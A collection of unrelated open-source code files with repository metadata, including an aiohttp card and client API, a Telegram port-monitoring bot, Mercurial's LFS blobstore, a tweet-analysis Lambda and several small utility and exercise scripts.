        responses:
            "200":
                description: успех. Возвращает список карт клиентов
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        encoder = self.__choose_encoder(request)
        offset, limit = self.__paginate(request)
        cards, count = await self.__client_model.all_cards(offset, limit)
        # X-Total carries the total row count alongside the paginated page.
        return web.Response(content_type=encoder.content_type, body=encoder.encode(cards),
                            headers={"X-Total": str(count)})

    async def add_card(self, request):
        """
        ---
        description: Запрос для добавления новой карты клиента
        tags:
        - Cards
        produces:
        - application/json
        - application/xml
        parameters:
        - name: card
          in: body
          description: данные новой карты
          required: true
          schema:
            type: object
            properties:
                owner_id:
                    type: integer
                    description: идентификатор владельца карты
                    required: true
                payment_system:
                    type: string
                    description: платежная система
                    required: true
                currency:
                    type: string
                    description: валюта карты
                    required: true
                balance:
                    type: numeric
                    description: баланс карты
                    required: true
        responses:
            "200":
                description: успех. Возвращает данные новой карты клиента
            "404":
                description: ошибка. Клиент не найден
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        encoder = self.__choose_encoder(request)
        data = await self.__decode_post(request)
        try:
            card = await self.__client_model.add_card(data)
            return web.HTTPCreated(content_type=encoder.content_type, body=encoder.encode(card))
        except MultipleInvalid as e:
            # voluptuous schema validation failure -> 400
            raise web_exceptions.HTTPBadRequest(text=str(e))
        except ItemNotFoundException as e:
            # unknown owner_id -> 404
            raise web_exceptions.HTTPNotFound(text=str(e))

    async def client_list(self, request):
        """
        ---
        description: Запрос для получения списка клиентов
        tags:
        - Clients
        produces:
        - application/json
        - application/xml
        parameters:
        - name: offset
          in: query
          description: Pagination offset
          required: false
          type: integer
        - name: limit
          in: query
          description: Pagination limit
          required: false
          type: integer
        responses:
            "200":
                description: успех. Возвращает список клиентов
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        encoder = self.__choose_encoder(request)
        offset, limit = self.__paginate(request)
        clients, count = await self.__client_model.all_clients(offset, limit)
        return web.Response(content_type=encoder.content_type, body=encoder.encode(clients),
                            headers={"X-Total": str(count)})

    async def add_client(self, request):
        """
        ---
        description: Запрос для добавления нового клиента
        tags:
        - Clients
        produces:
        - application/json
        - application/xml
        parameters:
        - name: card
          in: body
          description: данные нового клиента
          required: true
          schema:
            type: object
            properties:
                name:
                    type: string
                    description: имя клиента
        responses:
            "200":
                description: успех. Возвращает данные нового клиента
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        encoder = self.__choose_encoder(request)
        data = await self.__decode_post(request)
        try:
            client = await self.__client_model.add_client(data)
            return web.HTTPCreated(content_type=encoder.content_type, body=encoder.encode(client))
        except MultipleInvalid as e:
            raise web_exceptions.HTTPBadRequest(text=str(e))

    async def client_balance(self, request):
        """
        ---
        description: Запрос для получения баланса клиента
        tags:
        - Clients
        produces:
        - application/json
        - application/xml
        parameters:
        - name: id
          in: path
          description: идентификатор клиента
          required: false
          type: integer
        responses:
            "200":
                description: успех. Возвращает данные нового клиента
            "404":
                description: ошибка. Клиент не найден
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        # The {id:\d+} route guarantees a numeric match_info value.
        client_id = int(request.match_info.get('id'))
        encoder = self.__choose_encoder(request)
        client = await self.__client_model.client_balance(client_id)
        return web.Response(content_type=encoder.content_type, body=encoder.encode(client))

    async def change_card(self, request):
        """
        ---
        description: Запрос для изменение данных по карте
        tags:
        - Cards
        produces:
        - application/json
        - application/xml
        parameters:
        - name: id
          in: path
          description: идентификатор карты
          required: true
          type: integer
        - name: card
          in: body
          description: данные карты
          required: true
          schema:
            type: object
            properties:
                owner_id:
                    type: integer
                    description: идентификатор владельца карты
                payment_system:
                    type: string
                    description: платежная система
                currency:
                    type: string
                    description: валюта карты
                balance:
                    type: float
                    description: баланс карты
        responses:
            "200":
                description: успех. Возвращает измененные данные карты
            "400":
                description: ошибка клиента. Указаны неверные данные карты
            "404":
                description: ошибка. Карта не найдена
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        card_id = int(request.match_info.get('id'))
        encoder = self.__choose_encoder(request)
        data = await self.__decode_post(request)
        try:
            card = await self.__client_model.change_card(card_id, data)
            return web.Response(content_type=encoder.content_type, body=encoder.encode(card))
        except MultipleInvalid as e:
            # NOTE(review): unlike add_card, ItemNotFoundException is not
            # caught here even though the swagger doc advertises a 404 --
            # confirm change_card() cannot raise it, or add the handler.
            raise web_exceptions.HTTPBadRequest(text=str(e))
weierstrass54/sb_rest
api.py
api.py
py
12,166
python
en
code
0
github-code
36
72447544744
#!/usr/bin/python -tt # -*- coding: utf-8 -*- # Examen LAGRS, diciembre 2018 # NOMBRE: Jorge Luzon Lopez # LOGIN: jluzon import telepot import telepot.namedtuple import time import subprocess,sys import os from telepot.loop import MessageLoop from optparse import OptionParser PUERTOS_TCP = [6666 , 443 , 7899] def readkey(): try: file = open("token.txt","r") key = file.readline() file.close() return key except IOError: sys.stderr.write("Could not read key\n") raise SystemExit def iduser(): try: file = open("id_usuario.txt","r") key = file.readline() file.close() return key except IOError: sys.stderr.write("Could not read key\n") raise SystemExit TOKEN = readkey() ID_USUARIO = iduser() bot = telepot.Bot(TOKEN) def checkpuerto(port): for p in PUERTOS_TCP: if int(p) == int(port): return True def checkline(lines): r="" for l in lines: fields=l.split() if checkpuerto(fields[3].split(":")[-1]): r+=fields[3].split(":")[-1] + " " + fields[5] + "\n" return r def donetstat(): cmd = "netstat -tupan" try: out=subprocess.check_output(cmd.split()) out=out.split("\n") out.pop(0) out.pop(0) out.pop() r=checkline(out) return r except: sys.stderr.write("CMD failed\n") raise SystemExit def handle(): respuesta = donetstat() if len(respuesta) > 0: respuesta += "Ports USED\n" bot.sendMessage(ID_USUARIO,respuesta) return def main(): handle() if __name__ == '__main__': main()
jluzonlopez/Largs
extralagrs/vigila_puertos.py
vigila_puertos.py
py
1,538
python
en
code
0
github-code
36
31608746342
import torch from torch import nn from torch.autograd import Variable class topk_crossEntrophy(nn.Module): def __init__(self, top_k=0.7): super(topk_crossEntrophy, self).__init__() self.loss = nn.NLLLoss() self.top_k = top_k self.softmax = nn.LogSoftmax() return def forward(self, input, target): softmax_result = self.softmax(input) loss = Variable(torch.Tensor(1).zero_()).cuda() for idx, row in enumerate(softmax_result): gt = target[idx] pred = torch.unsqueeze(row, 0) gt = torch.unsqueeze(gt, 0) cost = self.loss(pred, gt) loss = torch.cat((loss, cost.unsqueeze(0)), 0) loss = loss[1:] if self.top_k == 1: valid_loss = loss index = torch.topk(loss, int(self.top_k * loss.size()[0])) valid_loss = loss[index[1]] return torch.mean(valid_loss)
Forrest0503/VAT-ABAW
ohem_loss.py
ohem_loss.py
py
987
python
en
code
0
github-code
36
5106024377
import re
import json
import base64
import pandas as pd
import networkx as nx
from textblob import TextBlob
from collections import defaultdict
from arabic_reshaper import reshape
from bidi.algorithm import get_display
from requests_toolbelt.multipart import decoder


def generate_hashtag_data(file_path):
    """Count hashtag frequencies in the 'Tweet' column of an Excel file.

    Returns both the raw frequency map and a copy whose keys were
    reshaped/reordered for right-to-left (Arabic) display.
    NOTE(review): the handler below passes raw file *bytes* as
    ``file_path``; confirm the installed pandas version accepts that for
    read_excel.
    """
    # Read the excel file
    df = pd.read_excel(file_path)

    # Define function to extract hashtags from each tweet
    def extract_hashtags(text):
        hashtags = re.findall(r'\#\w+', text)
        return hashtags

    # Create a list of all hashtags in the dataframe
    all_hashtags = []
    for tweet in df['Tweet']:
        hashtags = extract_hashtags(tweet)
        all_hashtags.extend(hashtags)

    # Create a dictionary to store the frequency of each hashtag
    frequency = {}
    for hashtag in all_hashtags:
        if hashtag in frequency:
            frequency[hashtag] += 1
        else:
            frequency[hashtag] = 1

    # Reshape and reorder the text
    reshaped_text = {}
    for k, v in frequency.items():
        reshaped_k = reshape(k)
        bidi_k = get_display(reshaped_k)
        reshaped_text[bidi_k] = v

    # Return the data
    return {
        "hashtag_frequency": frequency,
        "reshaped_text": reshaped_text
    }


def generate_sentiment_data(file_path):
    """Compute per-user TextBlob sentiment polarity series.

    Returns a list of {"user", "indices", "sentiments"} dicts, one per
    unique user, in the order tweets appear in the file.
    """
    # Load the data from Excel file
    df = pd.read_excel(file_path)

    # Define function to calculate sentiment polarity
    def get_sentiment(text):
        blob = TextBlob(text)
        return blob.sentiment.polarity

    # Create a dictionary to store sentiment values for each user
    sentiments = defaultdict(list)

    # Iterate over each row in the DataFrame
    for index, row in df.iterrows():
        # Get the user and tweet
        user = row['User']
        tweet = row['Tweet']

        # Calculate sentiment polarity of the tweet
        sentiment = get_sentiment(tweet)

        # Append sentiment to the list of sentiments for the user
        sentiments[user].append(sentiment)

    # Create a list of sentiment data for each user
    sentiment_data = []
    for user in df['User'].unique():
        user_sentiments = sentiments[user]
        indices = list(range(1, len(user_sentiments) + 1))
        sentiment_data.append(
            {"user": user, "indices": indices, "sentiments": user_sentiments})

    return sentiment_data


def generate_user_tweet_counts(file_path):
    """Return [{'User': ..., 'count': ...}, ...] -- tweets per user."""
    # Read the Excel file into a Pandas DataFrame
    df = pd.read_excel(file_path)

    # Group the data by user and count the number of tweets for each user
    user_counts = df.groupby('User').size().reset_index(name='count')

    # Convert the user_counts DataFrame into a list of dictionaries
    user_tweet_counts = user_counts.to_dict('records')

    return user_tweet_counts


def generate_user_mentions_graph_data(file_path):
    """Build a mention graph and return its top-10 users by degree centrality.

    Nodes are @-mentioned usernames; a directed edge links every ordered
    pair of users co-mentioned in the same tweet.
    """
    # Load the Excel file into a Pandas DataFrame
    df = pd.read_excel(file_path)

    # Extract the usernames from the tweet column using regular expressions
    df['username'] = df['Tweet'].str.extract(r'@(\w+)')

    # Create a list of unique usernames
    users = list(df['username'].dropna().unique())

    # Create an empty directed graph using NetworkX
    G = nx.DiGraph()

    # Add nodes to the graph for each user
    for user in users:
        G.add_node(user)

    # Add edges to the graph for each mention
    for tweet in df['Tweet']:
        # Find all mentions in the tweet using regular expressions
        mentions = re.findall(r'@(\w+)', tweet)

        # Create edges between the mentioned users
        for i in range(len(mentions)):
            for j in range(i+1, len(mentions)):
                G.add_edge(mentions[i], mentions[j])

    # Calculate the degree centrality of each node (user)
    centrality = nx.degree_centrality(G)

    # Sort the centrality dictionary by value in descending order
    sorted_centrality = sorted(
        centrality.items(), key=lambda x: x[1], reverse=True)

    # Get the top 10 most influential users
    top_users = [user[0] for user in sorted_centrality[:10]]

    # Create a subgraph of the top users
    H = G.subgraph(top_users)

    # Create a dictionary containing the necessary data for the frontend
    graph_data = {
        'nodes': [node for node in H.nodes()],
        'edges': [{'source': edge[0], 'target': edge[1]} for edge in H.edges()],
    }

    return graph_data


def generate_map_data(file_path):
    """Parse the 'coordinates' column into [{'lat': ..., 'lon': ...}, ...].

    Expects each cell to look like '...=<lon>,...=<lat>)'; rows without
    coordinates are skipped.
    """
    # Load the data from the Excel file
    data = pd.read_excel(file_path)

    # Filter out rows without coordinates
    data = data[data['coordinates'].notna()]

    # Extract coordinates and create a list of dictionaries with lat and lon
    coords_list = []
    for i, row in data.iterrows():
        coords_str = row['coordinates']
        lon = float(coords_str.split(',')[0].split('=')[1])
        lat = float(coords_str.split(',')[1].split('=')[1][:-1])
        coords_list.append({'lat': lat, 'lon': lon})

    # Return the coordinates data
    return coords_list


# CORS headers attached to every Lambda response.
headers = {
    "Access-Control-Allow-Origin": "*",  # Adjust the value according to your needs
    "Access-Control-Allow-Headers": "Content-Type,X-Amz-Date,Authorization,X-Api-Key",
    "Access-Control-Allow-Methods": "OPTIONS,GET,POST,PUT,PATCH,DELETE",
    "Access-Control-Allow-Credentials": "true",
}


def handler(event, context):
    """AWS Lambda entry point.

    Decodes a base64 multipart upload, takes the first part as the Excel
    file, and returns all analyses as one JSON payload.
    """
    # decode the multipart form data
    decoded_str = base64.b64decode(event["body"])
    content_type_header = event["headers"]["content-type"]
    multipart_data = decoder.MultipartDecoder(
        decoded_str, content_type_header)

    # get the file data from the multipart data
    file = multipart_data.parts[0]

    # print the file name
    print(file.headers[b'Content-Disposition'].decode().split(';')[1])

    # generate hashtag data
    hashtag_data = generate_hashtag_data(file.content)

    # generate sentiment data
    sentiment_data = generate_sentiment_data(file.content)

    # generate user tweet counts
    user_tweet_counts = generate_user_tweet_counts(file.content)

    # generate user mentions graph data
    user_mentions_graph_data = generate_user_mentions_graph_data(file.content)

    # generate map data
    map_data = generate_map_data(file.content)

    # return the response
    return {
        "statusCode": 200,
        "headers": headers,
        "body": json.dumps({
            "hashtag_data": hashtag_data,
            "sentiment_data": sentiment_data,
            "user_tweet_counts": user_tweet_counts,
            "user_mentions_graph_data": user_mentions_graph_data,
            "map_data": map_data
        })
    }
kashif-ghafoor/twitter-scrap-infa
src/hashtagAnalysis/index.py
index.py
py
6,609
python
en
code
0
github-code
36
13070129833
import math def roundPrice(A): # attention: in python3, round(1.5) = 1 !!! def round(x): fac = x - math.floor(x) return math.ceil(x) if fac >= 0.5 else math.floor(x) if not A: return A roundSum = sum(map(round, A)) sumRound = round(sum(A)) print(roundSum) print(sumRound) res = [round(a) for a in A] if roundSum == sumRound: return res elif roundSum > sumRound: cnt = roundSum - sumRound # need to make cnt number to round(number) - 1 nums = sorted([(a - math.floor(a), a, i) for i, a in enumerate(A)]) for fac, a, i in nums: if fac >= 0.5 and cnt > 0: res[i] = math.floor(a) cnt -= 1 else: res[i] = round(a) return res else: cnt = sumRound - roundSum # need to make cnt number to round(number) + 1 nums = sorted([(a - math.floor(a), a, i) for i, a in enumerate(A)])[::-1] for fac, a, i in nums: if fac < 0.5 and cnt > 0: res[i] = math.ceil(a) cnt -= 1 else: res[i] = round(a) return res print(roundPrice([1,2,3,4]))
Jason003/Interview_Code_Python
Airbnb/roundPrice.py
roundPrice.py
py
1,203
python
en
code
3
github-code
36
22577716879
''' Created on May 29, 2017 @author: hfrieden Export ASC DEM files ''' import struct import bpy import bmesh import os.path as path import ArmaToolbox from math import sqrt def vertIdx(x,y,ncols, nrows): return y*ncols + x def exportASC(context, fileName): filePtr = open(fileName, "wt") obj = context.object props = obj.armaHFProps # dump Header verts = len(obj.data.vertices) rowcols = sqrt(verts) filePtr.write("ncols " + str(rowcols) + "\n") filePtr.write("nrows " + str(rowcols) + "\n") filePtr.write("xllcorner " + str(props.northing) + "\n") filePtr.write("yllcorner " + str(props.easting) + "\n") filePtr.write("cellsize " + str(props.cellSize) + "\n") filePtr.write("NODATA_value " + str(props.undefVal) + "\n") # dump the heightfield. One line contains one row of vertices row = rowcols for v in obj.data.vertices: filePtr.write("{:.4f}".format(v.co[2])) row -= 1 if row == 0: filePtr.write("\n") row = rowcols else: filePtr.write(" ") filePtr.close()
AlwarrenSidh/ArmAToolbox
ArmaToolbox/ASCExporter.py
ASCExporter.py
py
1,167
python
en
code
70
github-code
36
29757178996
# Definition for a binary tree node. # class TreeNode(object): # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution(object): def isUnivalTree(self, root): """ :type root: TreeNode :rtype: bool """ unival = root.val stack = [root] while len(stack) > 0: cur = stack.pop() if cur != None: if cur.val != unival: return False stack.append(cur.left) stack.append(cur.right) return True
hrithikguy/leetcode
965_univalued_binary_tree.py
965_univalued_binary_tree.py
py
632
python
en
code
0
github-code
36
34530261292
from __future__ import absolute_import import hashlib import json import os import re import socket from mercurial.i18n import _ from mercurial import ( error, pathutil, url as urlmod, util, vfs as vfsmod, worker, ) from ..largefiles import lfutil # 64 bytes for SHA256 _lfsre = re.compile(r'\A[a-f0-9]{64}\Z') class lfsvfs(vfsmod.vfs): def join(self, path): """split the path at first two characters, like: XX/XXXXX...""" if not _lfsre.match(path): raise error.ProgrammingError('unexpected lfs path: %s' % path) return super(lfsvfs, self).join(path[0:2], path[2:]) def walk(self, path=None, onerror=None): """Yield (dirpath, [], oids) tuple for blobs under path Oids only exist in the root of this vfs, so dirpath is always ''. """ root = os.path.normpath(self.base) # when dirpath == root, dirpath[prefixlen:] becomes empty # because len(dirpath) < prefixlen. prefixlen = len(pathutil.normasprefix(root)) oids = [] for dirpath, dirs, files in os.walk(self.reljoin(self.base, path or ''), onerror=onerror): dirpath = dirpath[prefixlen:] # Silently skip unexpected files and directories if len(dirpath) == 2: oids.extend([dirpath + f for f in files if _lfsre.match(dirpath + f)]) yield ('', [], oids) class filewithprogress(object): """a file-like object that supports __len__ and read. Useful to provide progress information for how many bytes are read. """ def __init__(self, fp, callback): self._fp = fp self._callback = callback # func(readsize) fp.seek(0, os.SEEK_END) self._len = fp.tell() fp.seek(0) def __len__(self): return self._len def read(self, size): if self._fp is None: return b'' data = self._fp.read(size) if data: if self._callback: self._callback(len(data)) else: self._fp.close() self._fp = None return data class local(object): """Local blobstore for large file contents. This blobstore is used both as a cache and as a staging area for large blobs to be uploaded to the remote blobstore. 
""" def __init__(self, repo): fullpath = repo.svfs.join('lfs/objects') self.vfs = lfsvfs(fullpath) usercache = lfutil._usercachedir(repo.ui, 'lfs') self.cachevfs = lfsvfs(usercache) self.ui = repo.ui def open(self, oid): """Open a read-only file descriptor to the named blob, in either the usercache or the local store.""" # The usercache is the most likely place to hold the file. Commit will # write to both it and the local store, as will anything that downloads # the blobs. However, things like clone without an update won't # populate the local store. For an init + push of a local clone, # the usercache is the only place it _could_ be. If not present, the # missing file msg here will indicate the local repo, not the usercache. if self.cachevfs.exists(oid): return self.cachevfs(oid, 'rb') return self.vfs(oid, 'rb') def download(self, oid, src): """Read the blob from the remote source in chunks, verify the content, and write to this local blobstore.""" sha256 = hashlib.sha256() with self.vfs(oid, 'wb', atomictemp=True) as fp: for chunk in util.filechunkiter(src, size=1048576): fp.write(chunk) sha256.update(chunk) realoid = sha256.hexdigest() if realoid != oid: raise error.Abort(_('corrupt remote lfs object: %s') % oid) # XXX: should we verify the content of the cache, and hardlink back to # the local store on success, but truncate, write and link on failure? if not self.cachevfs.exists(oid): self.ui.note(_('lfs: adding %s to the usercache\n') % oid) lfutil.link(self.vfs.join(oid), self.cachevfs.join(oid)) def write(self, oid, data): """Write blob to local blobstore. This should only be called from the filelog during a commit or similar. As such, there is no need to verify the data. Imports from a remote store must use ``download()`` instead.""" with self.vfs(oid, 'wb', atomictemp=True) as fp: fp.write(data) # XXX: should we verify the content of the cache, and hardlink back to # the local store on success, but truncate, write and link on failure? 
if not self.cachevfs.exists(oid): self.ui.note(_('lfs: adding %s to the usercache\n') % oid) lfutil.link(self.vfs.join(oid), self.cachevfs.join(oid)) def read(self, oid, verify=True): """Read blob from local blobstore.""" if not self.vfs.exists(oid): blob = self._read(self.cachevfs, oid, verify) # Even if revlog will verify the content, it needs to be verified # now before making the hardlink to avoid propagating corrupt blobs. # Don't abort if corruption is detected, because `hg verify` will # give more useful info about the corruption- simply don't add the # hardlink. if verify or hashlib.sha256(blob).hexdigest() == oid: self.ui.note(_('lfs: found %s in the usercache\n') % oid) lfutil.link(self.cachevfs.join(oid), self.vfs.join(oid)) else: self.ui.note(_('lfs: found %s in the local lfs store\n') % oid) blob = self._read(self.vfs, oid, verify) return blob def _read(self, vfs, oid, verify): """Read blob (after verifying) from the given store""" blob = vfs.read(oid) if verify: _verify(oid, blob) return blob def has(self, oid): """Returns True if the local blobstore contains the requested blob, False otherwise.""" return self.cachevfs.exists(oid) or self.vfs.exists(oid) class _gitlfsremote(object): def __init__(self, repo, url): ui = repo.ui self.ui = ui baseurl, authinfo = url.authinfo() self.baseurl = baseurl.rstrip('/') useragent = repo.ui.config('experimental', 'lfs.user-agent') if not useragent: useragent = 'git-lfs/2.3.4 (Mercurial %s)' % util.version() self.urlopener = urlmod.opener(ui, authinfo, useragent) self.retry = ui.configint('lfs', 'retry') def writebatch(self, pointers, fromstore): """Batch upload from local to remote blobstore.""" self._batch(pointers, fromstore, 'upload') def readbatch(self, pointers, tostore): """Batch download from remote to local blostore.""" self._batch(pointers, tostore, 'download') def _batchrequest(self, pointers, action): """Get metadata about objects pointed by pointers for given action Return decoded JSON object like 
{'objects': [{'oid': '', 'size': 1}]} See https://github.com/git-lfs/git-lfs/blob/master/docs/api/batch.md """ objects = [{'oid': p.oid(), 'size': p.size()} for p in pointers] requestdata = json.dumps({ 'objects': objects, 'operation': action, }) batchreq = util.urlreq.request('%s/objects/batch' % self.baseurl, data=requestdata) batchreq.add_header('Accept', 'application/vnd.git-lfs+json') batchreq.add_header('Content-Type', 'application/vnd.git-lfs+json') try: rawjson = self.urlopener.open(batchreq).read() except util.urlerr.httperror as ex: raise LfsRemoteError(_('LFS HTTP error: %s (action=%s)') % (ex, action)) try: response = json.loads(rawjson) except ValueError: raise LfsRemoteError(_('LFS server returns invalid JSON: %s') % rawjson) return response def _checkforservererror(self, pointers, responses, action): """Scans errors from objects Raises LfsRemoteError if any objects have an error""" for response in responses: # The server should return 404 when objects cannot be found. Some # server implementation (ex. lfs-test-server) does not set "error" # but just removes "download" from "actions". Treat that case # as the same as 404 error. notfound = (response.get('error', {}).get('code') == 404 or (action == 'download' and action not in response.get('actions', []))) if notfound: ptrmap = {p.oid(): p for p in pointers} p = ptrmap.get(response['oid'], None) if p: filename = getattr(p, 'filename', 'unknown') raise LfsRemoteError( _(('LFS server error. Remote object ' 'for "%s" not found: %r')) % (filename, response)) else: raise LfsRemoteError( _('LFS server error. 
Unsolicited response for oid %s') % response['oid']) if 'error' in response: raise LfsRemoteError(_('LFS server error: %r') % response) def _extractobjects(self, response, pointers, action): """extract objects from response of the batch API response: parsed JSON object returned by batch API return response['objects'] filtered by action raise if any object has an error """ # Scan errors from objects - fail early objects = response.get('objects', []) self._checkforservererror(pointers, objects, action) # Filter objects with given action. Practically, this skips uploading # objects which exist in the server. filteredobjects = [o for o in objects if action in o.get('actions', [])] return filteredobjects def _basictransfer(self, obj, action, localstore): """Download or upload a single object using basic transfer protocol obj: dict, an object description returned by batch API action: string, one of ['upload', 'download'] localstore: blobstore.local See https://github.com/git-lfs/git-lfs/blob/master/docs/api/\ basic-transfers.md """ oid = str(obj['oid']) href = str(obj['actions'][action].get('href')) headers = obj['actions'][action].get('header', {}).items() request = util.urlreq.request(href) if action == 'upload': # If uploading blobs, read data from local blobstore. 
with localstore.open(oid) as fp: _verifyfile(oid, fp) request.data = filewithprogress(localstore.open(oid), None) request.get_method = lambda: 'PUT' for k, v in headers: request.add_header(k, v) response = b'' try: req = self.urlopener.open(request) if action == 'download': # If downloading blobs, store downloaded data to local blobstore localstore.download(oid, req) else: while True: data = req.read(1048576) if not data: break response += data if response: self.ui.debug('lfs %s response: %s' % (action, response)) except util.urlerr.httperror as ex: if self.ui.debugflag: self.ui.debug('%s: %s\n' % (oid, ex.read())) raise LfsRemoteError(_('HTTP error: %s (oid=%s, action=%s)') % (ex, oid, action)) def _batch(self, pointers, localstore, action): if action not in ['upload', 'download']: raise error.ProgrammingError('invalid Git-LFS action: %s' % action) response = self._batchrequest(pointers, action) objects = self._extractobjects(response, pointers, action) total = sum(x.get('size', 0) for x in objects) sizes = {} for obj in objects: sizes[obj.get('oid')] = obj.get('size', 0) topic = {'upload': _('lfs uploading'), 'download': _('lfs downloading')}[action] if len(objects) > 1: self.ui.note(_('lfs: need to transfer %d objects (%s)\n') % (len(objects), util.bytecount(total))) self.ui.progress(topic, 0, total=total) def transfer(chunk): for obj in chunk: objsize = obj.get('size', 0) if self.ui.verbose: if action == 'download': msg = _('lfs: downloading %s (%s)\n') elif action == 'upload': msg = _('lfs: uploading %s (%s)\n') self.ui.note(msg % (obj.get('oid'), util.bytecount(objsize))) retry = self.retry while True: try: self._basictransfer(obj, action, localstore) yield 1, obj.get('oid') break except socket.error as ex: if retry > 0: self.ui.note( _('lfs: failed: %r (remaining retry %d)\n') % (ex, retry)) retry -= 1 continue raise # Until https multiplexing gets sorted out if self.ui.configbool('experimental', 'lfs.worker-enable'): oids = worker.worker(self.ui, 0.1, 
transfer, (), sorted(objects, key=lambda o: o.get('oid'))) else: oids = transfer(sorted(objects, key=lambda o: o.get('oid'))) processed = 0 for _one, oid in oids: processed += sizes[oid] self.ui.progress(topic, processed, total=total) self.ui.note(_('lfs: processed: %s\n') % oid) self.ui.progress(topic, pos=None, total=total) def __del__(self): # copied from mercurial/httppeer.py urlopener = getattr(self, 'urlopener', None) if urlopener: for h in urlopener.handlers: h.close() getattr(h, "close_all", lambda : None)() class _dummyremote(object): """Dummy store storing blobs to temp directory.""" def __init__(self, repo, url): fullpath = repo.vfs.join('lfs', url.path) self.vfs = lfsvfs(fullpath) def writebatch(self, pointers, fromstore): for p in pointers: content = fromstore.read(p.oid(), verify=True) with self.vfs(p.oid(), 'wb', atomictemp=True) as fp: fp.write(content) def readbatch(self, pointers, tostore): for p in pointers: with self.vfs(p.oid(), 'rb') as fp: tostore.download(p.oid(), fp) class _nullremote(object): """Null store storing blobs to /dev/null.""" def __init__(self, repo, url): pass def writebatch(self, pointers, fromstore): pass def readbatch(self, pointers, tostore): pass class _promptremote(object): """Prompt user to set lfs.url when accessed.""" def __init__(self, repo, url): pass def writebatch(self, pointers, fromstore, ui=None): self._prompt() def readbatch(self, pointers, tostore, ui=None): self._prompt() def _prompt(self): raise error.Abort(_('lfs.url needs to be configured')) _storemap = { 'https': _gitlfsremote, 'http': _gitlfsremote, 'file': _dummyremote, 'null': _nullremote, None: _promptremote, } def _verify(oid, content): realoid = hashlib.sha256(content).hexdigest() if realoid != oid: raise error.Abort(_('detected corrupt lfs object: %s') % oid, hint=_('run hg verify')) def _verifyfile(oid, fp): sha256 = hashlib.sha256() while True: data = fp.read(1024 * 1024) if not data: break sha256.update(data) realoid = sha256.hexdigest() if 
realoid != oid: raise error.Abort(_('detected corrupt lfs object: %s') % oid, hint=_('run hg verify')) def remote(repo): """remotestore factory. return a store in _storemap depending on config""" url = util.url(repo.ui.config('lfs', 'url') or '') scheme = url.scheme if scheme not in _storemap: raise error.Abort(_('lfs: unknown url scheme: %s') % scheme) return _storemap[scheme](repo, url) class LfsRemoteError(error.RevlogError): pass
bruno-oliveira/twilioHackathon-whats-around-me
env/lib/python2.7/site-packages/hgext/lfs/blobstore.py
blobstore.py
py
17,091
python
en
code
0
github-code
36
12080392849
chemin = "C:/python/prenom.txt" chemin_clean = "C:/python/prenom_clean_correction.txt" with open(chemin, "r") as f: lines = f.read().splitlines() prenoms = [] for line in lines: prenoms.extend(line.split()) prenoms_final = [prenom.strip(",. ") for prenom in prenoms] with open(chemin_clean, "w") as f: f.write("\n".join(sorted(prenoms_final)))
yunus-gdk/python_beginner
trier_liste_noms_correction.py
trier_liste_noms_correction.py
py
360
python
en
code
0
github-code
36
40751695822
import pandas as pd import glob import numpy as np import os col_names = ['date','shop','item', 'unit', 'value'] month ='02' files = [] list_of_files = glob.glob(r'\\lhrnetapp03cifs.enterprisenet.org\rfeprodapp05\InputBackupFiles\CH\Import_M\Monthly-2019-M' r'M-0{month}\*'.format(month=month)) latest_file = max(list_of_files, key=os.path.getctime) print(latest_file) # latest_files.append(latest_file) for file in glob.glob(latest_file+r'\IMPO_RA32*'.format(month=month)): print(file) df = pd.read_csv(file, header=None, sep=';') # print(df.info()) files.append(df) if len(files) >1: full = pd.concat(files) dates = full.date.unique() else: full = files[0] # quit() full[11] = full[11].apply(lambda x: pd.to_numeric(x, errors='coerce')) full[10] = full[10].astype(float) # Q=0 OR (Q<0 AND V>0) OR (Q>0 AND V<0) print(full.info()) full=full[full[10] != 0] full=full[~((full[10] > 0)&(full[11] < 0))] full=full[~((full[10] <0)&(full[11] > 0))] # ujemne=full[~((full.unit >0)&(full.value > 0))] # full = full.groupby(['date','shop','item']).aggregate({'unit':np.sum, 'value':np.sum}) full=full[full[10] >0] print(full[11].sum())
owojtek18/CH_retailers
Import_ch.py
Import_ch.py
py
1,193
python
en
code
0
github-code
36
39687720281
import networkx as nx, matplotlib.pyplot as plt, numpy as np, copy import MarkovChain as SMC from Randomized import * from time import time Pps = 0.4 # float(input('Ingrese la probabilidad de que un dispositivo protegido pase a ser susceptible: ')) Psp = 0.3 # float(input('Ingrese la probabilidad de que un dispositivo susceptible pase a ser protegido: ')) Psc = 0.5 # float(input('Ingrese la probabilidad de que un dispositivo susceptible pase a ser comprometido: ')) Pcp = 0.2 # float(input('Ingrese la probabilidad de que un dispositivo comprometido pase a ser protegido: ')) Pci = 0.1 # float(input('Ingrese la probabilidad de que un dispositivo comprometido pase a ser irrecuperable: ')) prec = 5 # int(input('Ingrese el número de decimales a manejar: ')) t_lim = 100 # int(input('Ingrese el número máximo de momentos a estudiar: ')) base_MT = [[1 - Pps, Pps, 0, 0], [Psp, 1 - Psp - Psc, Psc, 0], [Pcp, 0, 1 - Pcp - Pci, Pci], [0, 0, 0, 1]] NetGraph, NetDevices, states = None, {}, ['Protegido', 'Susceptible', 'Comprometido', 'Irrecuperable'] HeatMap, gen_distr, N = [], [], 0 def setNonDefaults(Probs): (Pps, Psp, Psc, Pcp, Pci) = Probs base_MT = [[1 - Pps, Pps, 0, 0], [Psp, 1 - Psp - Psc, Psc, 0], [Pcp, 0, 1 - Pcp - Pci, Pci], [0, 0, 0, 1]] return Psp, Psc, base_MT def createNode(i, fs, nset, MT, adjust): vi = [0, 0, 0, 0] vi[states.index(fs)] = 1 if adjust: NetDevices[i]['factual_state'] = fs NetDevices[i]['init_vector'] = np.array(vi) NetDevices[i]['trans_matrix'] = copy.deepcopy(np.array(MT)) for n in nset: if (n not in NetDevices) or (i not in NetDevices[n]['neighbors']) and (len(NetDevices[n]['neighbors']) < 4): NetDevices[i]['neighbors'].append(n) NetDevices[n]['neighbors'].append(i) else: NetDevices[i] = { 'factual_state': fs, 'init_vector': np.array(vi), 'trans_matrix': copy.deepcopy(np.array(MT)), 'neighbors': nset } def setNeighborFactor(u, NetDevices, Psp, Psc): nset, count = NetDevices[u]['neighbors'], 0 if len(nset) == 0: NetDevices[u]['trans_matrix'][1][1] = 1 
